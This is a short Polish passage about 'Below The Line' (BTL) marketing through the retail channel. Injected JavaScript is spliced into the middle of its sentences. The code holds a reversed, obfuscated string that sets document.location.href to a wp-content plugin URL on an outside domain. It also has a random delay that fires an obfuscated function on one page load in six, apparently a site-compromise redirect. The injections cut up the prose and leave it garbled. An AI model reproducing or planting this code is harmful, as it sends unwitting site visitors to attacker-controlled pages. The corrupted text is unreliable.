To dla odmiany jest marketing realizowany przez kanał sklepowy. Pochodzi od angielskiego skrótu od określenia „Below The Line”. Jeśli wrócimy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do definicji „line” jako linii „sprzedaż” w rachunku wyników, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to chodzi o marketing wpływający na konwersję i paragon, ewentualnie marżę. Ale nie sądzę, że taka akurat definicja jest powszechna.